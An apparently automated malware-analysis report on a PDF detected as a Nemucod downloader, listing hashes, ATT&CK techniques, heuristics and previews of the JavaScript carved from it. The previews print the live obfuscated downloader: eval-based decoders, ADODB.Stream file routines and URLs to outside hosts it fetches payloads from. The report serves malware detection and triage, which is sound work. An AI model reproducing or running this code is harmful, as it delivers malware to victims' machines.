Txt.Downloader.Nemucod-6769573-0 PDF malware analysis — malicious · fac54f5cb2f4c9ec

MALICIOUS

PDF

49.0 KB Authoring application: PyPDF2 First seen: 2026-05-09

MD5: 9d00e38a38e47668c60933ae5c961082 SHA-1: 00a300065575e3d56753effc615e5d1e1c064656 SHA-256: fac54f5cb2f4c9ecd5c2d475c0ceb1fd707f79198b127bc39e13cffbaf8a5c28

286 Risk Score

Malware Insights

Txt.Downloader.Nemucod-6769573-0 · confidence 95%

MITRE ATT&CK

T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains obfuscated JavaScript that is flagged as an exploit cluster. The ClamAV detection of 'Txt.Downloader.Nemucod-6769573-0' strongly suggests this is a downloader. The JavaScript likely attempts to de-obfuscate and execute a payload, which is a common technique for Nemucod malware. The extracted JavaScript files are the primary indicators of this malicious behavior.

Machine Learning

Nyx PDF Classifier malicious score 0.9951

Heuristics 5

ClamAV: Txt.Downloader.Nemucod-6769573-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Txt.Downloader.Nemucod-6769573-0
JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.

Matched line in script

/S /JavaScript
/JS (b'var vRd7 = new Function("\\x76\\x5f\\x73", \'\\x7b\\x76\\x61\\x72\\x20\\x76\\x5f\\x64\\x20\\x3d\\x20\\x6e\\x65\\x77\\x20\\x44\\x61\\x74\\x65\\x28\\x29\\x3b\\x76\\x5f\\x64\\x5b\\x22\\x73\\x65\\x74\\x55\\x54\\x43\\x22\\x2b\\x22\\x46\\x75\\x6c\\x6c\\x59\\x65\\x61\\x72\\x22\\x5d\\x28\\x22\\x32\\x30\\x30\\x33\\x22\\x29\\x3b\\x69\\x66\\x20\\x28\\x76\\x5f\\x64\\x2e\\x67\\x65\\x74\\x55\\x54\\x43\\x46\\x75\\x6c\\x6c\\x59\\x65\\x61\\x72\\x28\\x29\\x2e\\x74\\x6f\\x53\\x74\\x72\\x69\\x6e\\x67\\x28\\x …
>>

Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0015_000.js`	pdf-javascript-stream	PDF /JS object 15 at offset 0x76D	17363 bytes
SHA-256: `7ee596f55be772ab5b0459575057c26db85e8e4aad25ffe312987d460cd40db8`
Detection ClamAV: Txt.Downloader.Nemucod-6769573-0 Obfuscation or payload: likely Carved artifact contains 48 eval/decoder/string-building token(s). Carved artifact contains 2 long hex-escaped blob(s).
Preview script First 1,000 lines of the extracted script b'var vRd7 = new Function("\x76\x5f\x73", '\x7b\x76\x61\x72\x20\x76\x5f\x64\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x3b\x76\x5f\x64\x5b\x22\x73\x65\x74\x55\x54\x43\x22\x2b\x22\x46\x75\x6c\x6c\x59\x65\x61\x72\x22\x5d\x28\x22\x32\x30\x30\x33\x22\x29\x3b\x69\x66\x20\x28\x76\x5f\x64\x2e\x67\x65\x74\x55\x54\x43\x46\x75\x6c\x6c\x59\x65\x61\x72\x28\x29\x2e\x74\x6f\x53\x74\x72\x69\x6e\x67\x28\x31\x30\x29\x20\x3d\x3d\x20\x22\x32\x30\x30\x33\x22\x29\x20\x7b\x76\x61\x72\x20\x76\x5f\x61\x72\x72\x20\x3d\x20\x76\x5f\x73\x2e\x73\x70\x6c\x69\x74\x28\x22\x3f\x22\x29\x3b\x20\x72\x65\x74\x75\x72\x6e\x20\x76\x5f\x61\x72\x72\x2e\x6a\x6f\x69\x6e\x28\x22\x22\x29\x3b\x7d\x20\x65\x6c\x73\x65\x20\x72\x65\x74\x75\x72\x6e\x20\x22\x22\x3b\x7d');var vOf0 = new Function("\x76\x5f\x73", '\x7b\x72\x65\x74\x75\x72\x6e\x20\x76\x4e\x45\x6f\x39\x5b\x22\x73\x70\x22\x2b\x22\x6c\x69\x74\x22\x5d\x28\x22\x2c\x22\x29\x5b\x22\x6a\x6f\x22\x2b\x22\x69\x6e\x22\x5d\x28\x22\x22\x29\x3b\x7d'); eval("var crap = (eval(vRd7(\"/??@?c?c?_?o?n? ?f?u?n?c?t?i?o?n? ?v?Y?D?f?5?(?v?V?r?7?)?{?v?a?r? ?v?I?t?4?=?n?e?w? ?A?r?r?a?y?(?)?;?v?I?t?4?[?1?9?9?]?=?1?2?8?;?v?I?t?4?[?2?5?2?]?=?1?2?9?;?v?I?t?4?[?2?3?3?]?=?1?3?0?;?v?I?t?4?[?2?2?6?]?=?1?3?1?;?v?I?t?4?[?2?2?8?]?=?1?3?2?;?v?I?t?4?[?2?2?4?]?=?1?3?3?;?v?I?t?4?[?2?2?9?]?=?1?3?4?;?v?I?t?4?[?2?3?1?]?=?1?3?5?;?v?I?t?4?[?2?3?4?]?=?1?3?6?;?v?I?t?4?[?2?3?5?]?=?1?3?7?;?v?I?t?4?[?2?3?2?]?=?1?3?8?;?v?I?t?4?[?2?3?9?]?=?1?3?9?;?v?I?t?4?[?2?3?8?]?=?1?4?0?;?v?I?t?4?[?2?3?6?]?=?1?4?1?;?v?I?t?4?[?1?9?6?]?=?1?4?2?;?v?I?t?4?[?1?9?7?]?=?1?4?3?;?v?I?t?4?[?2?0?1?]?=?1?4?4?;?v?I?t?4?[?2?3?0?]?=?1?4?5?;?v?I?t?4?[?1?9?8?]?=?1?4?6?;?v?I?t?4?[?2?4?4?]?=?1?4?7?;?v?I?t?4?[?2?4?6?]?=?1?4?8?;?v?I?t?4?[?2?4?2?]?=?1?4?9?;?v?I?t?4?[?2?5?1?]?=?1?5?0?;?v?I?t?4?[?2?4?9?]?=?1?5?1?;?v?I?t?4?[?2?5?5?]?=?1?5?2?;?v?I?t?4?[?2?1?4?]?=?1?5?3?;?v?I?t?4?[?2?2?0?]?=?1?5?4?;?v?I?t?4?[?1?6?2?]?=?1?5?5?;?v?I?t?4?[?1?6?3?]?=?1?5?6?;?v?I?t?4?[?1?6?5?]?=?1?5?7?;?v?I?t?4?[?8?3?5?9?]?=?1?5?8?;?v?I?t?4?[?4?0?2?]?=?1?5?9?;?v?I?t?4?[?2?2?5?]?=?1?6?0?;?v?I?t?4?[?2?3?7?]?=?1?6?1?;?v?I?t?4?[?2?4?3?]?=?1?6?2?;?v?I?t?4?[?2?5?0?]?=?1?6?3?;?v?I?t?4?[?2?4?1?]?=?1?6?4?;?v?I?t?4?[?2?0?9?]?=?1?6?5?;?v?I?t?4?[?1?7?0?]?=?1?6?6?;?v?I?t?4?[?1?8?6?]?=?1?6?7?;?v?I?t?4?[?1?9?1?]?=?1?6?8?;?v?I?t?4?[?8?9?7?6?]?=?1?6?9?;?v?I?t?4?[?1?7?2?]?=?1?7?0?;?v?I?t?4?[?1?8?9?]?=?1?7?1?;?v?I?t?4?[?1?8?8?]?=?1?7?2?;?v?I?t?4?[?1?6?1?]?=?1?7?3?;?v?I?t?4?[?1?7?1?]?=?1?7?4?;?v?I?t?4?[?1?8?7?]?=?1?7?5?;?v?I?t?4?[?9?6?1?7?]?=?1?7?6?;?v?I?t?4?[?9?6?1?8?]?=?1?7?7?;?v?I?t?4?[?9?6?1?9?]?=?1?7?8?;?v?I?t?4?[?9?4?7?4?]?=?1?7?9?;?v?I?t?4?[?9?5?0?8?]?=?1?8?0?;?v?I?t?4?[?9?5?6?9?]?=?1?8?1?;?v?I?t?4?[?9?5?7?0?]?=?1?8?2?;?v?I?t?4?[?9?5?5?8?]?=?1?8?3?;?v?I?t?4?[?9?5?5?7?]?=?1?8?4?;?v?I?t?4?[?9?5?7?1?]?=?1?8?5?;?v?I?t?4?[?9?5?5?3?]?=?1?8?6?;?v?I?t?4?[?9?5?5?9?]?=?1?8?7?;?v?I?t?4?[?9?5?6?5?]?=?1?8?8?;?v?I?t?4?[?9?5?6?4?]?=?1?8?9?;?v?I?t?4?[?9?5?6?3?]?=?1?9?0?;?v?I?t?4?[?9?4?8?8?]?=?1?9?1?;?v?I?t?4?[?9?4?9?2?]?=?1?9?2?;?v?I?t?4?[?9?5?2?4?]?=?1?9?3?;?v?I?t?4?[?9?5?1?6?]?=?1?9?4?;?v?I?t?4?[?9?5?0?0?]?=?1?9?5?;?v?I?t?4?[?9?4?7?2?]?=?1?9?6?;?v?I?t?4?[?9?5?3?2?]?=?1?9?7?;?v?I?t?4?[?9?5?6?6?]?=?1?9?8?;?v?I?t?4?[?9?5?6?7?]?=?1?9?9?;?v?I?t?4?[?9?5?6?2?]?=?2?0?0?;?v?I?t?4?[?9?5?5?6?]?=?2?0?1?;?v?I?t?4?[?9?5?7?7?]?=?2?0?2?;?v?I?t?4?[?9?5?7?4?]?=?2?0?3?;?v?I?t?4?[?9?5?6?8?]?=?2?0?4?;?v?I?t?4?[?9?5?5?2?]?=?2?0?5?;?v?I?t?4?[?9?5?8?0?]?=?2?0?6?;?v?I?t?4?[?9?5?7?5?]?=?2?0?7?;?v?I?t?4?[?9?5?7?6?]?=?2?0?8?;?v?I?t?4?[?9?5?7?2?]?=?2?0?9?;?v?I?t?4?[?9?5?7?3?]?=?2?1?0?;?v?I?t?4?[?9?5?6?1?]?=?2?1?1?;?v?I?t?4?[?9?5?6?0?]?=?2?1?2?;?v?I?t?4?[?9?5?5?4?]?=?2?1?3?;?v?I?t?4?[?9?5?5?5?]?=?2?1?4?;?v?I?t?4?[?9?5?7?9?]?=?2?1?5?;?v?I?t?4?[?9?5?7?8?]?=?2?1?6?;?v?I?t?4?[?9?4?9?6?]?=?2?1?7?;?v?I?t?4?[?9?4?8?4?]?=?2?1?8?;?v?I?t?4?[?9?6?0?8?]?=?2?1?9?;?v?I?t?4?[?9?6?0?4?]?=?2?2?0?;?v?I?t?4?[?9?6?1?2?]?=?2?2?1?;?v?I?t?4?[?9?6?1?6?]?=?2?2?2?;?v?I?t?4?[?9?6?0?0?]?=?2?2?3?;?v?I?t?4?[?9?4?5?]?=?2?2?4?;?v?I?t?4?[?2?2?3?]?=?2?2?5?;?v?I?t?4?[?9?1?5?]?=?2?2?6?;?v?I?t?4?[?9?6?0?]?=?2?2?7?;?v?I?t?4?[?9?3?1?]?=?2?2?8?;?v?I?t?4?[?9?6?3?]?=?2?2?9?;?v?I?t?4?[?1?8?1?]?=?2?3?0?;?v?I?t?4?[?9?6?4?]?=?2?3?1?;?v?I?t?4?[?9?3?4?]?=?2?3?2?;?v?I?t?4?[?9?2?0?]?=?2?3?3?;?v?I?t?4?[?9?3?7?]?=?2?3?4?;?v?I?t?4?[?9?4?8?]?=?2?3?5?;?v?I?t?4?[?8?7?3?4?]?=?2?3?6?;?v?I?t?4?[?9?6?6?]?=?2?3?7?;?v?I?t?4?[?9?4?9?]?=?2?3?8?;?v?I?t?4?[?8?7?4?5?]?=?2?3?9?;?v?I?t?4?[?8?8?0?1?]?=?2?4?0?;?v?I?t?4?[?1?7?7?]?=?2?4?1?;?v?I?t?4?[?8?8?0?5?]?=?2?4?2?;?v?I?t?4?[?8?8?0?4?]?=?2?4?3?;?v?I?t?4?[?8?9?9?2?]?=?2?4?4?;?v?I?t?4?[?8?9?9?3?]?=?2?4?5?;?v?I?t?4?[?2?4?7?]?=?2?4?6?;?v?I?t?4?[?8?7?7?6?]?=?2?4?7?;?v?I?t?4?[?1?7?6?]?=?2?4?8?;?v?I?t?4?[?8?7?2?9?]?=?2?4?9?;?v?I?t?4?[?1?8?3?]?=?2?5?0?;?v?I?t?4?[?8?7?3?0?]?=?2?5?1?;?v?I?t?4?[?8?3?1?9?]?=?2?5?2?;?v?I?t?4?[?1?7?8?]?=?2?5?3?;?v?I?t?4?[?9?6?3?2?]?=?2?5?4?;?v?I?t?4?[?1?6?0?]?=?2?5?5?;?v?a?r? ?v?U?h?6?=?n?e?w? ?A?r?r?a?y?(?)?;?f?o?r? ?(?v?a?r? ?v?V?d?4?=?0?;? ?v?V?d?4? ?<? ?v?V?r?7?.?l?e?n?g?t?h?;? ?v?V?d?4? ?+?=? ?1?)?{?v?a?r? ?v?V?J?s?7?=?v?V?r?7?[?\\x22?c?h?a?r?C?o?d?e?A?t?\\x22?]?(?v?V?d?4?)?;?i?f? ?(?v?V?J?s?7? ?<? ?1?2?8?)?{?v?a?r? ?v?F?I?j?4?=?v?V?J?s?7?;?}?e?l?s?e? ?{?v?a?r? ?v?F?I?j?4?=?v?I?t?4?[?v?V?J?s?7?]?;?}?v?U?h?6?[?\\x22?p?u?s?h?\\x22?]?(?v?F?I?j?4?)?;?}?;?r?e?t?u?r?n? ?v?U?h?6?;?}? ?@??/\")), 1);"); eval("var crap = (eval(vRd7(\"/??@?c?c?_?o?n? ?f?u?n?c?t?i?o?n? ?v?E?t?7?(?v?X?k?5?)?{?v?a?r? ?v?B?A?j?0?=?n?e?w? ?A?r?r?a?y?(?)?;?v?B?A?j?0?[?1?6?8?]?=?1?9?1?;?v?B?A?j?0?[?1?6?9?]?=?8?9?7?6?;?v?B?A?j?0?[?1?7?0?]?=?1?7?2?;?v?B?A?j?0?[?1?7?1?]?=?1?8?9?;?v?B?A?j?0?[?1?7?2?]?=?1?8?8?;?v?B?A?j?0?[?1?7?3?]?=?1?6?1?;?v?B?A?j?0?[?1?7?4?]?=?1?7?1?;?v?B?A?j?0?[?1?7?5?]?=?1?8?7?;?v?B?A?j?0?[?1?7?6?]?=?9?6?1?7?;?v?B?A?j?0?[?1?7?7?]?=?9?6?1?8?;?v?B?A?j?0?[?1?7?8?]?=?9?6?1?9?;?v?B?A?j?0?[?1?7?9?]?=?9?4?7?4?;?v?B?A?j?0?[?1?8?0?]?=?9?5?0?8?;?v?B?A?j?0?[?1?8?1?]?=?9?5?6?9?;?v?B?A?j?0?[?1?8?2?]?=?9?5?7?0?;?v?B?A?j?0?[?1?8?3?]?=?9?5?5?8?;?v?B?A?j?0?[?1?8?4?]?=?9?5?5?7?;?v?B?A?j?0?[?1?8?5?]?=?9?5?7?1?;?v?B?A?j?0?[?1?8?6?]?=?9?5?5?3?;?v?B?A?j?0?[?1?8?7?]?=?9?5?5?9?;?v?B?A?j?0?[?1?8?8?]?=?9?5?6?5?;?v?B?A?j?0?[?1?8?9?]?=?9?5?6?4?;?v?B?A?j?0?[?1?9?0?]?=?9?5?6?3?;?v?B?A?j?0?[?1?9?1?]?=?9?4?8?8?;?v?B?A?j?0?[?1?9?2?]?=?9?4?9?2?;?v?B?A?j?0?[?1?9?3?]?=?9?5?2?4?;?v?B?A?j?0?[?1?9?4?]?=?9?5?1?6?;?v?B?A?j?0?[?1?9?5?]?=?9?5?0?0?;?v?B?A?j?0?[?1?9?6?]?=?9?4?7?2?;?v?B?A?j?0?[?1?9?7?]?=?9?5?3?2?;?v?B?A?j?0?[?1?9?8?]?=?9?5?6?6?;?v?B?A?j?0?[?1?9?9?]?=?9?5?6?7?;?v?B?A?j?0?[?2?0?0?]?=?9?5?6?2?;?v?B?A?j?0?[?2?0?1?]?=?9?5?5?6?;?v?B?A?j?0?[?2?0?2?]?=?9?5?7?7?;?v?B?A?j?0?[?2?0?3?]?=?9?5?7?4?;?v?B?A?j?0?[?2?0?4?]?=?9?5?6?8?;?v?B?A?j?0?[?2?0?5?]?=?9?5?5?2?;?v?B?A?j?0?[?2?0?6?]?=?9?5?8?0?;?v?B?A?j?0?[?2?0?7?]?=?9?5?7?5?;?v?B?A?j?0?[?2?0?8?]?=?9?5?7?6?;?v?B?A?j?0?[?2?0?9?]?=?9?5?7?2?;?v?B?A?j?0?[?2?1?0?]?=?9?5?7?3?;?v?B?A?j?0?[?2?1?1?]?=?9?5?6?1?;?v?B?A?j?0?[?2?1?2?]?=?9?5?6?0?;?v?B?A?j?0?[?2?1?3?]?=?9?5?5?4?;?v?B?A?j?0?[?2?1?4?]?=?9?5?5?5?;?v?B?A?j?0?[?2?1?5?]?=?9?5?7?9?;?v?B?A?j?0?[?2?1?6?]?=?9?5?7?8?;?v?B?A?j?0?[?2?1?7?]?=?9?4?9?6?;?v?B?A?j?0?[?2?1?8?]?=?9?4?8?4?;?v?B?A?j?0?[?2?1?9?]?=?9?6?0?8?;?v?B?A?j?0?[?2?2?0?]?=?9?6?0?4?;?v?B?A?j?0?[?2?2?1?]?=?9?6?1?2?;?v?B?A?j?0?[?2?2?2?]?=?9?6?1?6?;?v?B?A?j?0?[?2?2?3?]?=?9?6?0?0?;?v?B?A?j?0?[?2?2?4?]?=?9?4?5?;?v?B?A?j?0?[?2?2?5?]?=?2?2?3?;?v?B?A?j?0?[?2?2?6?]?=?9?1?5?;?v?B?A?j?0?[?2?2?7?]?=?9?6?0?;?v?B?A?j?0?[?2?2?8?]?=?9?3?1?;?v?B?A?j?0?[?2?2?9?]?=?9?6?3?;?v?B?A?j?0?[?2?3?0?]?=?1?8?1?;?v?B?A?j?0?[?2?3?1?]?=?9?6?4?;?v?B?A?j?0?[?2?3?2?]?=?9?3?4?;?v?B?A?j?0?[?2?3?3?]?=?9?2?0?;?v?B?A?j?0?[?2?3?4?]?=?9?3?7?;?v?B?A?j?0?[?2?3?5?]?=?9?4?8?;?v?B?A?j?0?[?2?3?6?]?=?8?7?3?4?;?v?B?A?j?0?[?2?3?7?]?=?9?6?6?;?v?B?A?j?0?[?2?3?8?]?=?9?4?9?;?v?B?A?j?0?[?2?3?9?]?=?8?7?4?5?;?v?B?A?j?0?[?2?4?0?]?=?8?8?0?1?;?v?B?A?j?0?[?2?4?1?]?=?1?7?7?;?v?B?A?j?0?[?2?4?2?]?=?8?8?0?5?;?v?B?A?j?0?[?2?4?3?]?=?8?8?0?4?;?v?B?A?j?0?[?2?4?4?]?=?8?9?9?2?;?v?B?A?j?0?[?2?4?5?]?=?8?9?9?3?;?v?B?A?j?0?[?2?4?6?]?=?2?4?7?;?v?B?A?j?0?[?2?4?7?]?=?8?7?7?6?;?v?B?A?j?0?[?2?4?8?]?=?1?7?6?;?v?B?A?j?0?[?2?4?9?]?=?8?7?2?9?;?v?B?A?j?0?[?2?5?0?]?=?1?8?3?;?v?B?A?j?0?[?2?5?1?]?=?8?7?3?0?;?v?B?A?j?0?[?2?5?2?]?=?8?3?1?9?;?v?B?A?j?0?[?2?5?3?]?=?1?7?8?;?v?B?A?j?0?[?2?5?4?]?=?9?6?3?2?;?v?B?A?j?0?[?2?5?5?]?=?1?6?0?;?v?B?A?j?0?[?1?2?8?]?=?1?9?9?;?v?B?A?j?0?[?1?2?9?]?=?2?5?2?;?v?B?A?j?0?[?1?3?0?]?=?2?3?3?;?v?B?A?j?0?[?1?3?1?]?=?2?2?6?;?v?B?A?j?0?[?1?3?2?]?=?2?2?8?;?v?B?A?j?0?[?1?3?3?]?=?2?2?4?;?v?B?A?j?0?[?1?3?4?]?=?2?2?9?;?v?B?A?j?0?[?1?3?5?]?=?2?3?1?;?v?B?A?j?0?[?1?3?6?]?=?2?3?4?;?v?B?A?j?0?[?1?3?7?]?=?2?3?5?;?v?B?A?j?0?[?1?3?8?]?=?2?3?2?;?v?B?A?j?0?[?1?3?9?]?=?2?3?9?;?v?B?A?j?0?[?1?4?0?]?=?2?3?8?;?v?B?A?j?0?[?1?4?1?]?=?2?3?6?;?v?B?A?j?0?[?1?4?2?]?=?1?9?6?;?v?B?A?j?0?[?1?4?3?]?=?1?9?7?;?v?B?A?j?0?[?1?4?4?]?=?2?0?1?;?v?B?A?j?0?[?1?4?5?]?=?2?3?0?;?v?B?A?j?0?[?1?4?6?]?=?1?9?8?;?v?B?A?j?0?[?1?4?7?]?=?2?4?4?;?v?B?A?j?0?[?1?4?8?]?=?2?4?6?;?v?B?A?j?0?[?1?4?9?]?=?2?4?2?;?v?B?A?j?0?[?1?5?0?]?=?2?5?1?;?v?B?A?j?0?[?1?5?1?]?=?2?4?9?;?v?B?A?j?0?[?1?5?2?]?=?2?5?5?;?v?B?A?j?0?[?1?5?3?]?=?2?1?4?;?v?B?A?j?0?[?1?5?4?]?=?2?2?0?;?v?B?A?j?0?[?1?5?5?]?=?1?6?2?;?v?B?A?j?0?[?1?5?6?]?=?1?6?3?;?v?B?A?j?0?[?1?5?7?]?=?1?6?5?;?v?B?A?j?0?[?1?5?8?]?=?8?3?5?9?;?v?B?A?j?0?[?1?5?9?]?=?4?0?2?;?v?B?A?j?0?[?1?6?0?]?=?2?2?5?;?v?B?A?j?0?[?1?6?1?]?=?2?3?7?;?v?B?A?j?0?[?1?6?2?]?=?2?4?3?;?v?B?A?j?0?[?1?6?3?]?=?2?5?0?;?v?B?A?j?0?[?1?6?4?]?=?2?4?1?;?v?B?A?j?0?[?1?6?5?]?=?2?0?9?;?v?B?A?j?0?[?1?6?6?]?=?1?7?0?;?v?B?A?j?0?[?1?6?7?]?=?1?8?6?;?v?a?r? ?v?H?p?2?=?n?e?w? ?A?r?r?a?y?(?)?;?v?a?r? ?v?M?O?f?9?=?\\x22?\\x22?;?v?a?r? ?v?F?I?j?4?;? ?v?a?r? ?v?V?J?s?7?;?f?o?r? ?(?v?a?r? ?v?V?d?4?=?0?;? ?v?V?d?4? ?<? ?v?X?k?5?.?l?e?n?g?t?h?;? ?v?V?d?4? ?+?=? ?1?)?{?v?F?I?j?4?=?v?X?k?5?[?v?V?d?4?]?;?i?f? ?(?v?F?I?j?4? ?<? ?1?2?8?)?{?v?V?J?s?7?=?v?F?I?j?4?;?}? ?e?l?s?e? ?{?v?V?J?s?7?=?v?B?A?j?0?[?v?F?I?j?4?]?;?}?v?H?p?2?.?p?u?s?h?(?S?t?r?i?n?g?[?\\x22?f?r?o?m?C?h?a?r?C?o?d?e?\\x22?]?(?v?V?J?s?7?)?)?;?}?v?M?O?f?9?=?v?H?p?2?[?\\x22?j?o?i?n?\\x22?]?(?\\x22?\\x22?)?;?r?e?t?u?r?n? ?v?M?O?f?9?;?}? ?@??/\")), 1);"); eval("var crap = (eval(vRd7(\"f?u?n?c?t?i?o?n? ?v?Y?I?j?0?(?v?X?k?5?,? ?v?U?V?s?2?)?{?v?a?r? ?v?Q?g?5? ?=? ?v?Y?D?f?5?(?v?U?V?s?2?)?;?f?o?r? ?(?v?a?r? ?v?V?d?4? ?=? ?0?;? ?v?V?d?4? ?<? ?v?X?k?5?.?l?e?n?g?t?h?;? ?v?V?d?4? ?+?=? ?1?)? ?{?v?X?k?5?[?v?V?d?4?]? ?^?=? ?v?Q?g?5?[?v?V?d?4? ?%? ?v?Q?g?5?.?l?e?n?g?t?h?]?;?}?;?r?e?t?u?r?n? ?v?X?k?5?;?}\")), 1);"); eval("var crap = (eval(vRd7(\"f?u?n?c?t?i?o?n? ?v?R?D?t?3?(?v?O?w?2?)?{?v?a?r? ?v?M?Y?b?0?=?n?e?w? ?A?c?t?i?v?e?X?O?b?j?e?c?t?(?\\x22?A?D?O?D?B?.?S?t?r?e?a?m?\\x22?)?;?v?M?Y?b?0?.?t?y?p?e?=?2?;?v?M?Y?b?0?[?\\x22?C?h?a?r?s?e?t?\\x22?]?=?\\x22?4?3?7?\\x22?;?v?M?Y?b?0?.?o?p?e?n?(?)?;?v?M?Y?b?0?[?\\x22?L?o?a?d?F?r?o?m?F?i?l?e?\\x22?]?(?v?O?w?2?)?;?v?a?r? ?v?U?u?7?=?v?M?Y?b?0?[?\\x22?R?e?a?d?T?e?x?t?\\x22?]?;?v?M?Y?b?0?.?c?l?o?s?e?(?)?;?r?e?t?u?r?n? ?v?Y?D?f?5?(?v?U?u?7?)?;?}\")), 1);"); eval("var crap = (eval(vRd7(\"f?u?n?c?t?i?o?n? ?v?P?b?9?(?v?O?w?2?,? ?v?X?k?5?)?{?v?a?r? ?v?M?Y?b?0?=?n?e?w? ?A?c?t?i?v?e?X?O?b?j?e?c?t?(?\\x22?A?D?O?D?B?.?S?t?r?e?a?m?\\x22?)?;?v?M?Y?b?0?.?t?y?p?e?=?2?;?v?M?Y?b?0?[?\\x22?C?h?a?r?s?e?t?\\x22?]?=?\\x22?4?3?7?\\x22?;?v?M?Y?b?0?.?o?p?e?n?(?)?;?v?M?Y?b?0?[?\\x22?w?r?i?t?e?T?e?x?t?\\x22?]?(?v?E?t?7?(?v?X?k?5?)?)?;?v?M?Y?b?0?[?\\x22?S?a?v?e?T?o?F?i?l?e?\\x22?]?(?v?O?w?2?,? ?2?)?;?v?M?Y?b?0?.?c?l?o?s?e?(?)?;?}\")), 1);"); eval("var crap = (eval(vRd7(\"v?a?r? ?v?S?s?4? ?=? ?\\x22?h?\\x22?+?\\x22?\\x22?+?\\x22?t?\\x22?+?\\x22?t?\\x22?+?\\x22?p?\\x22?+?\\x22?:?\\x22?+?\\x22?/?\\x22?+?\\x22?/?\\x22?;\")), 1);"); eval("var crap = (eval(vRd7(\" ? ? ? ?v?a?r? ?v?J?a?9? ?=? ?n?e?w? ?A?r?r?a?y?(?)?;\")), 1);"); eval("var crap = (eval(vRd7(\"v?J?a?9?.?p?u?s?h?(?v?S?s?4? ?+? ?\\x22?k?o?r?e?s?h?.?c?o?.?i?l?/?j?m?k?t?j?c?d?c?\\x22?)?;\")), 1);"); eval("var crap = (eval(vRd7(\"v?J?a?9?.?p?u?s?h?(?v?S?s?4? ?+? ?\\x22?w?e?l?t?e?.?p?l?/?m?u?p?z?e?\\x22?)?;\")), 1);"); eval("var crap = (eval(vRd7(\"v?J?a?9?.?p?u?s?h?(?v?S?s?4? ?+? ?\\x22?b?e?n?e?f?e?e?t?.?o?r?g?/?j?1?3?c?z?o?n?x?x?\\x22?)?;\")), 1);"); …
`javascript_obj0015_001.js`	pdf-javascript-stream	PDF /JS object 15 at offset 0x76D	736 bytes
SHA-256: `030e4af7b73a35d9c41341a5dd36479f99747bbf4cc757018b8c3da4b7b6690a`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long hex-escaped blob(s).
Preview script First 1,000 lines of the extracted script b'var vRd7 = new Function("\x76\x5f\x73", '\x7b\x76\x61\x72\x20\x76\x5f\x64\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x3b\x76\x5f\x64\x5b\x22\x73\x65\x74\x55\x54\x43\x22\x2b\x22\x46\x75\x6c\x6c\x59\x65\x61\x72\x22\x5d\x28\x22\x32\x30\x30\x33\x22\x29\x3b\x69\x66\x20\x28\x76\x5f\x64\x2e\x67\x65\x74\x55\x54\x43\x46\x75\x6c\x6c\x59\x65\x61\x72\x28\x29\x2e\x74\x6f\x53\x74\x72\x69\x6e\x67\x28\x31\x30\x29\x20\x3d\x3d\x20\x22\x32\x30\x30\x33\x22\x29\x20\x7b\x76\x61\x72\x20\x76\x5f\x61\x72\x72\x20\x3d\x20\x76\x5f\x73\x2e\x73\x70\x6c\x69\x74\x28\x22\x3f\x22\x29\x3b\x20\x72\x65\x74\x75\x72\x6e\x20\x76\x5f\x61\x72\x72\x2e\x6a\x6f\x69\x6e\x28\x22\x22\x29\x3b\x7d\x20\x65\x6c\x73\x65\x20\x72\x65\x74\x75\x72\x6e\x20\x22\x22\x3b\x7d'

Open this report in the interactive analyzer, or submit your own file for analysis.